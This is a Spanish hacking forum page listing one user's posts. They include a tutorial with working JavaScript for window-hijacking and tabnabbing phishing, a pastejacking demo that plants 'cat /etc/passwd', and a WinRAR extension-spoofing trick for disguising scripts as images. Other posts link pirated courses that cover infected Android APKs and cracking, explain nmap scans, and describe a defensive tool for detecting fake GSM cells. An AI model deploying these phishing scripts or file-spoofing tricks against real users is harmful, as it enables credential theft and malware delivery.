Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - Aryenal.Bt

Páginas: [1] 2 3 ... 13
1
Tefo es normal q te lo detecte. Te recomendaría utilizar una maquina virtual.

Enviado desde mi Redmi Pro mediante Tapatalk


2
Hacking / Re:phishing avanzado
« en: Junio 19, 2016, 09:53:38 pm »
saludos brth.

3
Hacking / phishing avanzado
« en: Junio 19, 2016, 12:53:31 pm »
El phishing tradicional funciona principalmente enviando a los usuarios un correo con un enlace que, si pinchan, les redireccionará a un sitio malicioso, normalmente una web falsa que se hace pasar por otra legítima. Pero, ¿y si la redirección al sitio falso se produce de forma inadvertida en una de las múltiples pestañas abiertas en el navegador?

Hoy vamos a ver dos formas ingeniosas para conseguirlo. La primera denominada 'Windows hijacking' que establecerá un contador al abrir una pestaña que una vez llegue a 0 cambiará la localización a la página fraudulenta. La segunda llamada 'tap nabbing' hará se cambie el contenido igualmente pero en otra pestaña que el usuario no está viendo en ese momento. De esa forma cuando el usuario vuelva a la pestaña creerá que la dejó abierta (por ej. Gmail) y se volverá a loggear.

Window hijacking

Es sabido que configurar un tag con un atributo como _blank tiene ciertos riesgos de seguridad:

https://mathiasbynens.github.io/rel-noopener/

Esto es debido a que una nueva página abierta tiene la capacidad de cambiar la ubicación de la ventana (windows location) con lo siguiente:

window.opener.location = "https://google.com"

Además es posible también crear una página web con la capacidad de crear una nueva página en una nueva pestaña, y luego cambiar la ubicación de la página recién creada después de un periodo arbitrario de tiempo. Esto se puede lograr de la siguiente manera:

Código: [Seleccionar]
<script>
    var windowHijack = function(){
        window.open('https://legitloginpage.xyz', 'test');
        setTimeout(function(){window.open('https://notlegitloginpage.xyz', 'test');}, 300000);
    }
</script>
<button onclick="windowHijack()">Open Window!</button>

En el ejemplo anterior, una nueva ventana se abre cuando se pulsa el botón y, 5 minutos más tarde, la nueva ventana cambiará de sitio. Incluso si en la nueva pestaña se navega a otro sitio web o se actualiza, el sitio original todavía podría cambiar la ubicación.

Demo1

En este ejemplo, se enlaza con una página de login y el temporizador se establece en 5 segundos. Cuando el tiempo se agota, la página de inicio de sesión legítima se cambia a una página de acceso ilegítimo que tiene un keylogger instalado.

https://security.love/windowHijacking

Demo2

En este ejemplo secundario, el ataque se combina con Pastejacking. Primero el enlace apunta a serverfault.com y, después de haber sido abierto, un segundo temporizador de 5 segundos va a cambiar la ubicación del sitio Web legítimo de serverfault a un clon maligno de la página original, con código pastejacking. Esto hace que cualquier usuario que intente copiar la respuesta en su lugar se inyecte "cat /etc/passwd \n" en su portapapeles.

https://security.love/windowHijacking/index2.html

Tap nabbing

Las pestañas o ventanas abiertas utilizando JavaScript o target = "_blank" aunque limitado tienen acceso a la ventana padre, haciendo caso omiso de las restricciones de cross-origin. Entre ellos la capacidad de redirigir la pestaña padre o de la ventana usando window.opener.location.

Si bien ésto puede parecer inofensivo, es posible realizar un ataque de phishing cuando las aplicaciones web permiten o hacen uso de anchors con target = "_blank" o window.open().

Imagina el siguiente escenario, el más típico:

Eres un administrador utilizando algún foro o software de chat. Actualmente estás conectado en la aplicación, y ves un mensaje dejado por un usuario. El usuario solicita o te convence para que hagas clic en un enlace de su mensaje, que se abre en una nueva pestaña. Mientras que la nueva página puede parecer completamente segura - tal vez sólo una captura de pantalla o o un error en HTML - ejecuta el siguiente JS:

window.opener.location.assign ('https://yourcompanyname.phishing.com');

Lo que no te das cuenta es que al tratar con este cliente ilegítimo o queja del usuario, la pestaña de la aplicación fue redireccionada en background. ¿A qué? A un sitio web de suplantación de identidad idéntico, que solicita que introduzcas tus credenciales para entrar de nuevo.

Demo1

Un enlace que abre _blank en una nueva pestaña. El código JavaScript que se ejecuta en la nueva pestaña tiene un handler con window.opener. La página abierta abre una página falsa de Github con el mensaje "Timeout, please log in again".  El usuario cierra la pestaña abierta y vuelve a lo que cree que es GitHub, donde vuelve a introducir las credenciales.

 http://molnarg.github.io/tabnabbing-demo/decoy_document.html

Fuentes:
- windowHijacking
- Mozilla detecta un nuevo tipo de phishing, el tab napping
- Tabnabbing demo
- blankshield
- hackplayers ->http://www.hackplayers.com/2016/06/jugando-con-las-tabs-del-navegador-para-phishing.html

4
Hacking / Re:Tutorial phishing
« en: Noviembre 16, 2014, 04:09:51 am »
buen post, algo por donde comenzar.

5
Hacking / Re:Aplicación online Security Training.
« en: Septiembre 24, 2014, 07:20:42 pm »
hey men gracias por el dato lo voy a comenzar!

6
De hecho casi todo el contenido son aplicaciones (sin tutorial ni nada, aviso para los novatos), mañana veré un par de videos a ver que tal están...

Un saludo.

de echo algunos usuarios tienen razon, así que por ello subiré el material en el que apartare los videotutoriales y Software incluido.

Saludos.

7
Parece muy bueno ANTRAX lo leere.
Gracias!.

8
Hacking / Re:Routerpwn (Framework de exploits para routers)
« en: Mayo 17, 2014, 01:03:45 pm »
no puedes hackear una cuenta de facebook si a eso indica tu pregunta, el framework solo lanza ataques a routes especificos y que posean vulnerabilidades especificas.
saludos

10

HackingMexico: Certificación de Seguridad Ofensiva
Spanish | DVD 1 | NRG | 2.85 GB | HackingMexico | Incl. Herramientas

La demanda por gente especializada en seguridad informática es cada vez mas alta, los mejores empleos son para la gente capacitada, y si bien sabemos la realidad hoy en día un papel o diploma NO GARANTIZA conocimientos, sin embargo a la hora de las entrevistas laborales son las que mas peso tienen. Es por eso que hemos diseñado este curso con toda nuestra experiencia en Seguridad Informática (mas de 15 años) para acelerar el aprendizaje y entender los conceptos de forma practica.
Antes de tomar una certificacion, pregunta a tus conocidos, hay algunas muy comerciales como CEH (Certified Ethical Hacker) donde sus cursos son videos de diapositivas con definiciones de Wikipedia, nosotros te enseñamos las tecnicas en VIVO, el curso es 100% practico con ejemplos reales.
Aprenderas la filosofia de la Seguridad Ofensiva que se enfoca en adentrarse a la manera de pensar del atacante.

El curso comienza desde las bases de instalacion de software y laboratorios virtuales, hasta ataques web e ingenieria inversa. No vamos a mentirte, la seguridad informatica es una forma de vida, y con 1 solo curso que tomes no podras dominarla, sin embargo tendras las bases para poder iniciar tu carrera como Pentester y hacer tus propias investigaciones digitales.
 
DOCENTES
Los profesores estan avalados como Cientificos de la Seguridad Informatica a nivel nacional por la Confederacion de Abogados Latinoamericanos A.C, Centro Interamericano de Certificacion de Habilidad Juridica Seccion Morelos, Zona Oriente Morelense de Estudiantes A.C, La Asociacion de Oradores y Lolografos Juristas A.C, Rescate Turistico de Morelos, y las autoridades de la Secretaria de Seguridad Publica y Transito Municipal del Estado de Morelos.

El cuerpo docente lo integran:

M.C Raul Robles Aviles (CEO de HackingMexico) aka Megabyte
Gonzalo Sanchez S (Security Analyst) aka Drummer
Alejandro Torres (Investigador Reversing) aka TorresCrack

Contenido:

Introduccion

Que es un hacker?
Tipos de hacker
Sistemas Operativos
Conceptos basicos de Networking
Instalacion de entornos virtuales
Conociendo VMware
Corriendo sistemas operativos simultaneamente
Creando maquinas virtuales
Configuracion NAT y Bridged
Instalacion de diferentes OS para pruebas
Instalacion de entorno Apache, php y mysql en Windows
Instalacion de Perl
Instalacion de Phyton
Comandos de consola cmd y terminal

Hackeo y Defensa de Paginas Web

-Information Gathering
-Frameworks de explotacion via Browser
-Ataques XSS (Cross Site Scripting)
-Ataques de ejecucion remota
-Elaboracion de exploits con Phyton
-Herramientas de escaneo de vulnerabilidades
-Shells PHP
-Remote File Inclusion
-Wargames
-Cross Site Request Forgery
-Ataques de estres DoS
-Hackeo de un Casino Online

Man in the Middle

-Definicion MITM
-ARP Poisoning
-Interceptar datos via Browser
-Modificacion de Cabezeras
-Interceptar datos de un binario
-Ataques de red local
-Atacando a Windows XP desde BackTrack
-Atacando a BackTrack desde Windows XP
-Credential Harvesting
-Ataques automatizados

Metasploit

-Armitage
-Social Engineering ToolKit
-Vectores de Ataque
-Hacking Mysql Servers con metasploit
-Hacking XAMPP con metasploit
-Brute Force al ssh de iPhone/ipad/ipodTouch


VIRTUALIZACION CLOUD PARA MITIGAR DDOS

-Cloud Hosting
-SAN Storage
-Diferencia entre Raids
-Algoritmos de alta redundancia
-Maquinas virtuales configuracion VMware Workstation
-Virtual Storage Appliace (VSA)
-Creando clusters
-Managers, y Fail Over Manager
-Iniciador iSCSI
-Montando tu primer volumen virtualizado
-Pruebas de alta disponibilidad contra DDoS
-Snapshots, Rollover volume
-Fractional Bandwidth Protection
-IP Virtual para manejar clusters

SQL Injection

1.-Inyeccion SQL . ¿Qué es?
2.-Factores que propician esta vulnerabilidad
3.-Instalacion de la herramienta SQL MAP
4.-Instalacion de Phyton (Windows)
5.-Conociendo la herramienta SQL MAP
6.-Conociendo a nuestro objetivo
6.1.-Nmap Scanner
6.2.-Whois
6.3.-Obtencion de Mails mediante script en phyton
7.-Obtencion de Datos de Mysql
8.-Obtencion de Usuarios
9.-Buscando el Panel de Administracion
10.-Instalando el Entorno grafico de “SQL-Map”

Android Hacking

1.-Consola de Metasploit
1.1.-busqueda de módulos y exploits para Android
2.1.-Creacion de un “.Apk” infectado para su instalación en un sistema Android
2.2.-Instalacion del “.Apk” (intervención del usuario)
3.-Explotacion Local y Remota
3.1.-Acceso local al dispositivo
3.2.-Manejo de la sesión “meterpreter” en el Dispositivo infectado
3.3.-Conociendo las cámaras de fotografía del dispositivo
3.4.-Tomando fotografías con el Dispotivo (cámara frontal y delantera)
3.5.-Robo de información , fotografías , bd de whatsapp (en caso de tener)
3.6.-Explotacion Remota
3.6.1.-Conociendo nuestra infraestructura (provedor de servicio , Modem , Velocidad de conexión)
3.6.2.-Conociendo el Servicio No-ip + creación y configuración de nuestro modem
3.7.-Explotacion 100% remota.

Recuperación de Datos mediante consola Forense

1.-Conociendo el Software “PhotoRec”
2.-Instalacion y creación de Alias
3.-Perdiendo/Borrando Datos en una USB/HDD
4.-Ejercicio de Recuperacion
5.-Analisis de Datos
6.-Recuperacion de Archivos a nivel Forense

Dumpeo de memoria RAM
Analisis de metadatos
Cadena de custodia

INGENIERIA INVERSA Y CRACKING

* PE structure
* Metodo – String references
* Metodo – Serial fishing
* Metodo – API cracking
* Creando un parche
* Creando Loader
* crackeando aplicaciones .NET
* crackeando aplicaciones JAVA
* Unpacking
* OEP finding
* IAT rebuilding
* Uso de scripts – Ollyscripting
* Metodo – Inline patching
* Metodos anticracking (antidump, antidebugging)
* Keygenning (creando nuestro propio generador de licencias)






Descarga: http://safelinknsn.net/p/847d79f859
Fuente:Descargasnsn

11
Hacking / Falsificación de extensiones de ficheros en WinRAR (0-day)
« en: Marzo 25, 2014, 07:56:47 pm »
Hace poco se mostraba en un blog israelí una vulnerabilidad 0-day en la versión 4.20 de WinRAR (otras versiones podrían verse también afectadas) con la que es posible engañar muy fácilmente a un usuario para que ejecute por ejemplo... un troyano. Además es sumamente sencilla de explotar...

Para nuestra PoC empezaremos creando un simple vbs 'pruebas.vbs':

MsgBox("PWNED! jajaj")

y lo comprimiremos creando el fichero 'pruebas.zip':


Cuando tratamos de comprimir el archivo en "formato ZIP" con WinRAR, la estructura de archivos es la estándar pero WinRAR añade varias propiedades adicionales, como un segundo nombre de archivo:


¿Qué pasa si modificamos ese nombre con nuestro editor hexadecimal por algo más "sugerente" como 'tetazas.jpg'?:


Veamos el resultado:


Al abrir el fichero comprimido nos muestra aparentemente una imagen, pero al hacer doble clic en ella se ejecutará nuestro script, es decir, hemos falsificado el nombre y la extensión del fichero comprimido ... con lo que todo ello supone...

Portaros bien!

Fuente: http://www.hackplayers.com/2014/03/falsificacion-de-extensiones-winrar.html

12
Seguridad Wireless / Re:LINSET 0.12 - WPA/2 Hack sin Fuerza Bruta
« en: Marzo 12, 2014, 01:33:22 am »
Testeada y va de maravilla (15 WPA Hack en menos de 1 hora) muy buena herramienta.

13
Seguridad Wireless / Re:Crackear redes WPA/WPA-PSK(PRE SHARED KEY)
« en: Marzo 12, 2014, 01:31:32 am »
Bien explicado Brth. se agradece el post.

14
Phreak / Detectando celdas falsas GSM/GPRS con Cell Analysis
« en: Marzo 12, 2014, 01:09:54 am »

Introducción

Durante este último año, investigando los ataques y vulnerabilidades en la red GSM, me di de bruces con el ataque de la estación falsa BTS. Este consiste en un ataque "Man In The Middle" tradicional, en el que el atacante sitúa su propia antena entre nuestro terminal y la red. La base para que este ataque sea factible son dos vulnerabilidades muy sencillas:

Nuestro terminal NO autentifica la red GSM a la que se conecta, la supone segura.
El terminal se conecta siempre a la celda que mejor nivel de señal le proporcione.
Este tipo de ataques han sido documentados en varias conferencias de seguridad; BlackHat 2011, CCC, DefCon, etc. Como muestra el video de DefCon 18, de Chris Paget, "Practical Cellphone Spying"


Esto además se complica (o mejora para los posibles atacantes) al poder crear una celda falsa utilizando únicamente un teléfono compatible con osmocom y el software OpenBTS u Osmo-BTS. Ya no es necesario ningún hardware caro ni raro de conseguir, ni soldar y des-soldar las placas del USRP1, ni una BTS real: sólo un teléfono Osmocom.

¿Cómo protegernos de estos ataques?

El equipo de SRLabs (Karsten Nohl) ha creado la herramienta catchercatcher  http://opensource.srlabs.de/projects/catcher para detectar posibles ataques, tal y como publicaron en el 28C3, basándose por supuesto en OsmocomBB. Cuando lo he probado, hay algo que no me ha gustado: para que el software detecte los ataques necesitamos ejecutar el programa con una tarjeta SIM dentro del teléfono. ¿Qué pasa si me quiero desplazar a otro sitio? ¿Dejo de detectar posibles ataques? Lógicamente la necesidad de la tarjeta SIM tiene su explicación, ya que con este programa también se detectan los famosos SMS invisibles (para lo cual necesitamos estar registrados en la red GSM).

Respetando la idea de SRLabs he creado un proyecto nuevo: Cell Analysis, con un fin claro y sencillo: detectar celdas falsas (BTS falsas, IMSI Catcher o BTS Rogue, como queráis llamarlo). Para ello necesitaremos un teléfono osmocom y no vamos a utilizar ninguna tarjeta SIM, escanearemos todas las celdas independientemente de la operadora a la que pertenezcan.

La base de la detección es precisamente que una celda falsa nunca llevará el mismo tráfico de control que una celda real. ¿Qué es tráfico de control? En el standard GSM se han definido canales lógicos para transmitir y recibir la información según una jerarquía de canales:


Dentro del canal de control común ("CCCH") nos vamos a fijar en el canal de Paging ("PCH"), que es el que la red GSM utiliza para alertar a los abonados que tienen un servicio pendiente de entrega, donde el servicio será una llamada, un mensaje corto, etc. ¿Y que tiene una celda falsa que decirles a sus abonados? ... Nada o muy poco.

A continuación muestro dos capturas realizadas del tráfico del canal de control común en celdas de cada tipo: real y falsa:



Fijaros bien en el contenido de los mensajes "Paging Request", porque en el caso de la celda falsa el campo "Mobile Identity" está siempre o casi siempre vacío, puesto que no hay usuarios reales a los que anunciarles la entrega de servicios. El porcentaje de mensajes sin un TMSI o un IMSI no puede apreciarse en la captura de pantalla, pero si en la celda falsa no hay ningún teléfono conectado será del 100%. Sin embargo en una celda real el campo "Mobile Identity", la mayor parte de la veces llevará un TMSI o IMSI en porcentajes elevados. Dependiendo de la hora del día, de la celda, de la operadora y más parámetros, variará el valor del porcentaje de mensajes de "Paging Request" con un abonado, pero nunca alcanzará el valor de la celda falsa.

Este análisis es el que va a realizar el programa para cada celda que encuentre y lo hará continuamente cada 10 minutos, hasta que decidamos parar la aplicación. Para cada una de las celdas que no son falsas, generará un fichero CSV con la fecha y hora así como los valores de abonados conectados y potencia con la que el teléfono osmocom recibe la señal de esa celda. Con cada celda falsa que encuentre enviará a una cuenta de correo configurada previamente un email de alarma. Por último, aquellas medidas que hayan tenido demasiados errores ("Dropping Frames", "BURST IND", etc) serán ignoradas guardándose en un tercer fichero de medidas ignoradas.

Para descargar Cell Analysis, esta es la web  http://www.fakebts.com/ donde además podéis encontrar las instrucciones para instalarlo y configurarlo correctamente.

Test de Cell Analysis

Para probar la detección he elegido el escenario más simple, dos teléfono osmocom; uno corriendo Cell Analysis (monitorizando el tráfico) y el otro corriendo el SW de transmisión con OpenBTS (transmitiendo una celda falsa).


NOTA IMPORTANTE: transmitir en el espectro de frecuencias asignado a GSM es un delito, esta prueba debe ser llevada a cabo con una jaula de faraday para aislar el alcance de nuestra transmisión.

Una vez la celda falsa queda definida y configurada con valores reales (MCC 214, MNC 22 y ARFCN 1), tal y como se haría en un ataque real, el segundo teléfono osmocom empieza a transmitir:


El primer teléfono empieza a ejecutar Cell Analysis. Observar en la segunda ventana (al frente) el listado de las celdas que ha encontrado el teléfono y fijaros en la tercera celda (es la falsa):


Cuando Cell Analysis realiza el siguiente paso, que es la monitorización del trafico del canal de control común, sólo encuentra los mensajes "System Information" SI1 y SI3, pero no encuentra ningún abonado en la celda:


Por lo que se genera una alarma correspondiente en un fichero CSV y se envía por correo.

Conclusiones

- Como hemos visto, sí se pueden detectar sin problemas las celdas falsas y avisar para, desde luego apagar cualquier teléfono que pueda ser víctima del ataque ya que en nuestros terminales no podemos forzar o elegir a qué celda se deben conectar, lo harán a la que mejor señal les entregue.

- Cell Analysis también genera ficheros CSV para las celdas que no son falsas con medidas de potencia y número de abonados acampados en ella. Se pueden visualizar los resultados en Excel de manera muy sencilla:


- En toda monitorizacíón hay un parámetro que mide la eficacia: la cantidad (o ausencia) de alarmas falsas generadas. Durante semanas he tenido corriendo el programa y no ha detectado ninguna alarma falsa, pero lógicamente es más que probable que esto pueda suceder. Por ejemplo: si una celda real tiene una avería y  momentáneamente los abonados no pueden acampar en ella, sus "Paging Request" estarán vacíos.

Sobre FakeBTS.com

 - El proyecto Cell Analysis se encuentra recogido en la web fakebts.com donde seguiré actualizando siguientes versiones con mejoras pendientes de implementar:
Pequeño interfaz web para comprobar el estado de la monitorización y gestionar las alarmas
Recoger las medidas de las celdas con "rrdtool" para mostrar gráficas en el interfaz web en tiempo real
Crear paquetes .deb para facilitar la instalación en Ubuntu
Portar el proyecto a la plataforma ARM (Raspberry Pi)
Seguir investigando distintas celdas falsas en busca de nuevos retos a detectar
Autor: Pedro Cabrera

Fuente:SbD

16
Hacking / Re:Curso - Capacity: Seguridad Informática
« en: Diciembre 28, 2013, 07:58:14 pm »
acabo de revisarlo, esta bien.
1.-  accedes al link despues que hayas escrito el Captcha
2.- abre el JDownloader y das click debajo de lo que dice Links de contenedor "CNL2"

17
Hacking / Curso - Capacity: Seguridad Informática
« en: Diciembre 28, 2013, 03:12:25 pm »


Capacity: Seguridad Informática - CompTIA Security+
Español | 1.68 GB | .FLV | Profesor: Eugenio Duarte | Seguridad | CapacityAcademy

Descripcion:

Le gustaria hacerse Hacker Informático? Paso a Paso: ¡Hágase Experto en Seguridad TI!

Ahora desde su casa u oficina: Usted puede convertirse en Arquitecto de Seguridad, Ingeniero de Seguridad, Analista de Seguridad, o Técnico en Seguridad de la Información. ¡Con este curso podrá certificarse de CompTIA Security+!

A través de 7 módulos llenos de Videos y Recursos, y junto a su Profesor Eugenio Duarte, usted podrá iniciar a construir una carrera en Seguridad Informática.
Dominará temas como: Ataques y mitigación, Seguridad de Red y Aplicaciones, Recuperación de Desastres, Reporte de Incidentes y evaluación de vulnerabilidades. 100% Garantizado.

¿Qué aprenderá si toma este Curso?

En este curso usted aprenderá todo desde cero. No necesita tener conocimientos previos de Seguridad Informática. Le enseñaremos cada concepto, paso a paso.

A continuación mire solo algunas de las cosas que aprenderá a hacer:

Identificar las diferentes amenazas de seguridad de los sistemas
Explicar los riesgos de seguridad relacionados con el hardware y los periféricos de los sistemas
Implementar prácticas para reforzar la seguridad de los Sistemas Operativos y procedimientos para lograr la seguridad de PCs y Servidores
Determinar el uso apropiado de herramientas de seguridad para facilitar la seguridad de la red
Explicar las vulnerabilidades y técnicas de mitigación asociadas con los dispositivos de red, medios de transmisión y las redes inalámbricas
Identificar y aplicar las mejores prácticas de la industria para métodos de control de acceso
Desplegar varios modelos de autenticación e identificar los componentes de cada uno
Llevar a cabo análisis de riesgo e implementar la mitigación de estos
Usar herramientas de monitoreo de seguridad en los sistemas y redes para detectar anomalías relacionadas con seguridad
Llevar a cabo auditorias periódicas de configuraciones de seguridad en los sistemas
Entender los conceptos generales de criptografía, hash, y encriptación.

¿Quién será su profesor?

Profesor Eugenio Duarte
Ingeniero en Sistemas de Computación, con amplia experienca en arquitectura de servidores de Redes utilizando Linux, Tecnología de Voz sobre IP, Seguridad de Redes de Datos, Routing, Switching y Virtual Private Network (VPN). Eugenio un experto en Redes Cisco.

El Profesor Duarte posee las siguientes certificaciones: CCNA Voice, CCNA Security, CCDA, CCNA, Linux+, Network+, Security+, CWNA.

Capturas:


Descargar: http://safelinknsn.net/p/446e8df075
Pass: www.descargasnsn.com
Pd. para la descarga utilizar el programa JDownloader
Fuente: Descargasnsn

18
Hacking / Re:Curso de Ethical Hackers
« en: Noviembre 14, 2013, 04:12:37 pm »
Que buen material gracias por compartirlo Stuxnet.
Saludos

19
Hacking / Footprinting (Recogo de Informacion)
« en: Septiembre 10, 2013, 11:17:02 pm »

Tal como se indica en el tema el footprinting es la fase donde se recoge información sobre el objetivo (cuentas de correos, direcciones Ip, nombres de ordenadores y sistemas que corren sobre ellos, etc.) para ello existen 2 técnicas (Pasivas y Activas):

Técnicas Pasivas: Consiste en el recogo de información pero de forma indirecta para realizar aquello tenemos:

- Whois: Determina datos del propietario de un nombre de dominio o de una dirección Ip.
- Nslookup: http://es.wikipedia.org/wiki/Nslookup
- Google Hacking: Google Hacking o Google Operadores es una técnica en informática que utiliza para filtrar información en buscador de Google. Además podemos encontrar otras aplicaciones de agujeros de seguridad en la configuración y el código informático que se utilizan en las páginas web.
- Fuzzers: http://en.wikipedia.org/wiki/Fuzz_testing
- etc.

Técnicas Activas: A diferencia de las T. Pasivas esta consiste en interactuar directamente con los sistemas para aprender sobre su configuración y comportamiento.

Vamos a utilizar módulos de tipo auxiliary para llevar a ejecución distintos tipos de escaneos:

Half Scam: Este tipo de escaneo consiste:

1.- El emisor envía un SYN para iniciar la conexión
2.- Si el receptor envía un SYN+ACK (el puerto esta abieto)
3.- El emisor cierra la conexión enviadole un RST+ACK


ACK Scam: El objetivo de este escaneo no es determinar si un puerto se encuentra abierto o no, sino si un equipo de la red escucha las peticiones a traves de un firewall:

1.- El emisor envía un paquete con un ACK activo
2.- El receptor debe responder con un RST este el puerto abierto o no
3.- Si no hay respuesta es que existe un cortafuegos en medio de la comunicación.


Null Scam: Este tipo de escaneo consiste:

1.- El emisor envia un paquete (No contiene ningun Bit activo)
2.- Si el puerto se encuentra abierto no se recibirá respuesta
3.- Si el puerto se encuentra cerrado el receptor envia un RST+ACK

Modo de ejecucion (Nmap):
Código: [Seleccionar]
nmap -sN <Direccion Ip>
Fin Scam: Este tipo de escaneo consiste:

1.- El emisor crea un paquete TCP con el Bit de Fin activo
2.- Si el puerto se encuentra abierto no se obtendra respuesta.
3.- Si el puerto se encuentra cerrado el receptor envia un RST+ACK

Modo de ejecucion (Nmap):
Código: [Seleccionar]
nmap -sN <Direccion Ip>
* Los puntos y herramientas que se han tocado en este Post son solo pocos de muchos.

Próximo Post: Nmap+Msf
Saludos.  8)

20
Dudas y pedidos generales / Re:¿como proteger mis datos personales?
« en: Septiembre 05, 2013, 05:28:56 pm »
la forma que un atacante podría accesar o espiar tu ordenador seria:
- encontrar alguna vulnerabilidad en tu sistema (ten siempre tus sistema y tus programas actualizados)
- realizar ataques de red como por ejemplo Spoofing (http://es.wikipedia.org/wiki/Spoofing) (detecta estos ataques con marmita de i64 http://underc0de.org/foro/seguridad/marmita-detectando-ataques-man-in-the-middle/) (contraresta esto utilizando Túnel SSH como bien lo ha dicho Sanko o utiliza una VPN)

Saludos.

Páginas: [1] 2 3 ... 13